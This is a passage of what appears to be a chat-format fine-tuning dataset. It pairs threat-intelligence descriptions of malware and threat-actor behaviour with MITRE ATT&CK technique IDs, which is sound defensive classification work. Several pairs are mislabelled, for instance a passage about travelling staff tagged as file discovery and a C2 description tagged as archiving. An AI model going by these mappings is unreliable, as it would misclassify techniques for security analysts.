\"ID# - Technique\". " }, { "role": "user", "content": "The encryption style does not differ significantly from other prominent ransomware families. WastedLocker will attempt to encrypt files on local as well as remote (network adjacent and accessible) and removable drives. Once the eligible drives are located, the ransomware will begin the encryption process" }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects user files from the compromised host based on predefined file extensions." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-1314 actors used a victim's endpoint management platform, Altiris, for lateral movement." }, { "role": "assistant", "content": "T1072 - Software Deployment Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bisonal has been loaded through a `.wll` extension added to the ` %APPDATA%\\microsoft\\word\\startup\\` repository." }, { "role": "assistant", "content": "T1137.006 - Office Application Startup: Add-ins" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zeus Panda uses PowerShell to download and execute the payload." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Drovorub can use TCP to communicate between its agent and client modules." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors executed an encoded VBScript file using `wscript` and wrote the decoded output to a text file." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM used a modified version of HTRAN to redirect connections between networks." }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ComRAT has used \"cmd.exe\" to execute commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Babuk can use multiple Windows API calls for actions on compromised hosts including discovery and execution." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In one intrusion, the first second-stage custom loader (TEARDROP) was introduced to the environment by BusinessLayerHost.exe at around 10:00 AM UTC. 7z.dll), Far Manager (e.g. The Variant 2 custom loaders were mostly compiled from open-source source code of legitimate applications, such as 7-Zip and Far Manager (i.e. the open-source source code for these applications was modified to add in the malicious code). In some instances, certain development artifacts were left behind in the custom loader samples. For example, the following C++ header (.hpp) path was observed in a loader compiled from a modified Far Manager open-source source code (c:\\build\\workspace\\cobalt_cryptor_far (dev071)\\farmanager\\far\\platform.concurrency.hpp" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Business and government personnel who are traveling, especially in a foreign country, often rely on systems to conduct business other than those at their home office, and may be unfamiliar with threats posed while abroad" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects MAC address and local IP address information from the victim." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The captured sample used in this analysis is an MSI file named “view-(AVISO)2020.msi” that is spread through a ZIP archive, just as with the previous variant. In the previous analysis, I showed that this MSI file is parsed and executed automatically by MsiExec.exe when a user double clicks on it in Windows OS" }, { "role": "assistant", "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can record keystrokes from both the keyboard and virtual keyboard." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - xxmm downloader (also known as KVNDM) — This simple downloader's code is similar to the main xxmm payload. MSGet — This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. MSGet typically downloads encoded binaries from hard-coded URLs. Use the ‘at' or ‘schtask' commands to register a scheduled task to be executed in a few minutes. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. In particular, review network access for use of mobile USB modems on corporate systems" }, { "role": "assistant", "content": "T1102.001 - Dead Drop Resolver" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "probes the system to check for sandbox/virtualized environments and other antimalware processes." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This component achieves persistence through the Run registry key and has full backdoor capabilities: it can download and execute binaries, run arbitrary commands or upload files from the victim computer to the C&C server" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fysbis can collect information about running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the configuration is parsed, Cardinal RAT will proceed with making attempts at connecting with the C2. Using an example request and response from a C2 server, we can see how this traffic is configured" }, { "role": "assistant", "content": "T1560.002 - Archive Collected Data: Archive via Library" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Goopy has the ability to communicate with its C2 over HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has enumerated sessions and users on a remote host, and identified privileged users logged into a targeted system." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkHydrus used an open-source tool, Phishery, to inject malicious remote template URLs into Microsoft Word documents and then sent them to victims to enable Forced Authentication." }, { "role": "assistant", "content": "T1221 - Template Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has used key loggers to steal usernames and passwords." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used multiple layers of encryption within malware to protect C2 communication." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can gather information on the mapped drives, OS version, computer name, and memory size." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ThiefQuest uses AppleScript's \"osascript -e\" command to launch ThiefQuest's persistence via Launch Agent and Launch Daemon." }, { "role": "assistant", "content": "T1059.002 - Command and Scripting Interpreter: AppleScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Email attacks often use “click-worthy” or interesting topics to convince users to click links or open attachments that could lead to various threats" }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The CozyCar dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file." }, { "role": "assistant", "content": "T1036.003 - Masquerading: Rename System Utilities" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell supports functionality for VNC sessions." }, { "role": "assistant", "content": "T1021.005 - Remote Services:VNC" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RogueRobin checks the running processes for evidence it may be running in a sandbox environment. It specifically enumerates processes for Wireshark and Sysinternals." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download an executable to run on the victim." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda has sent malicious links including links directing victims to a Google Drive folder." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The FunnyDream FilePakMonitor component has the ability to collect files from removable devices." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To decrypt the configuration data, the malware uses XOR with 25-character keys such as “waEHleblxiQjoxFJQaIMLdHKz” that are different for every sample. RC4 file encryption relies on the Windows 32 CryptoAPI, using the provided value’s MD5 hash as an initial vector. Among all these random keys once the word “salamati” was also used, which means “health” in Farsi" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can gather network share information." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 places scripts in the startup folder for persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Dust Storm, the threat actors used JavaScript code." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use a number of known techniques to bypass Windows UAC." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The chinapolicyanalysis.org domain was used as the sender address, as well as the hosting location of the malicious RTF document" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Later, the malware enters in a big block of trash code that also includes some elements to decrypt strings and important information for later" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LazyScripter has used GitHub to host its payloads to operate spam campaigns." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windshift has used malware to identify installed AV and commonly used forensic and malware analysis tools." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 3: The first step of decryption will perform XOR on one byte using the previous adjacent byte, starting from the last byte and excluding the first byte Figure 4: The second step uses RC4, using the first 0x20 bytes from the result of the first step as the RC4 key Figure 5: Encrypted (Top) and decrypted (bottom) configuration file It is also important to note that while the loader component and the configuration file are located in the same directory (%windows%\\system32), the encrypted backdoor is located in a different directory (%Program Files%\\Common Files\\System\\ado)" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor can detect whether it is executed in some virtualized or emulated environment by searching for specific artifacts, such as communication with I/O ports and using VM-specific instructions." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In all stages of the attack, the actor demonstrated a deep knowledge of software tools, deployments, security software and systems common in networks, and techniques frequently used by incident response teams. This knowledge is reflected in the actor’s operational decisions, from the choice of command-and-control (C2) infrastructure to the naming of scheduled tasks used to maintain persistence" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tropic Trooper has lured victims into executing malware via malicious e-mail attachments." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoomBox has the ability to mask malicious data strings as PDF files." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADNEWS encrypts C2 data with a ROR by 3 and an XOR by 0x23." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MirageFox is likely loaded via DLL hijacking into a legitimate McAfee binary." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volgmer can gather information about TCP connection state." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "build_downer has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SideTwist can encrypt C2 communications with a randomly generated key." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. UNC2465 also uses the publicly available NGROK utility to bypass firewalls and expose remote desktop service ports, like RDP and WinRM, to the open internet. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "executes BAT and VBS scripts." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aria-body has used TCP in C2 communications." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can disable Avira anti-virus." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNSPOT decrypts SUNBURST, which was stored in AES128-CBC encrypted blobs." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has used \"InstallUtil.exe\" to execute malicious software." }, { "role": "assistant", "content": "T1218.004 - Signed Binary Proxy Execution: InstallUtil" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Raindrop was installed under names that resembled legitimate Windows file and directory names." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used malware that can capture screenshots of the victim’s machine." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Compromises users’ saved passwords from browsers." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used various batch scripts to establish C2, download additional files, and conduct other functions." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can wipe drives using Remove-Item commands." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Action RAT has the ability to download additional payloads onto an infected machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As mentioned in our earlier technical report on Trojan.Hydraq, the back door allows the attacker to perform any of the following activities: - Adjust token privileges. Create, modify, and delete registry subkeys. Retrieve a list of logical drives. Uninstall itself by deleting the HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\RaS[FOUR RANDOM CHARACTERS] subkey" }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has used WebDAV to upload stolen USB files to a cloud drive. Turla has also exfiltrated stolen files to OneDrive and 4shared." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "running software, system name, IP address) - install additional malware onto the system - check for the presence of 29 different antivirus tools" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "created new Windows services and added them to the startup directories for persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ThiefQuest uses a function named \"is_debugging\" to perform anti-debugging logic. The function invokes \"sysctl\" checking the returned value of \"P_TRACED\". ThiefQuest also calls \"ptrace\" with the \"PTRACE_DENY_ATTACH\" flag to prevent debugging." }, { "role": "assistant", "content": "T1622 - Debugger Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used brute force techniques to obtain credentials." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. In the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January 2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. The primary difference was that this sample was encrypted and password protected, requiring the victim to enter in a password which was likely provided by the adversary to view the document. Typically, password protected documents is commonly used by adversaries as an evasion tactic to bypass automated analysis mechanisms due to the password requirement for successful execution. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The DOC file contains an embedded OLE Object that, upon execution, triggers the download of an additional DOC file from the stored URL (seen in Figure 3)" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California. It is not known why the actors picked this company -- and others listed in Table 1 below -- to impersonate but, as previously mentioned, their use of filenames and URLs makes their payloads appear benign and trustworthy" }, { "role": "assistant", "content": "T1587.002 - Code Signing Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cadelspy has the ability to steal information about printers and the documents sent to printers." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once the password (delivered in the body of the email) is entered, the users are presented with a document that will request users to enable the malicious macro, as shown in Figure 3" }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT34 has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning." }, { "role": 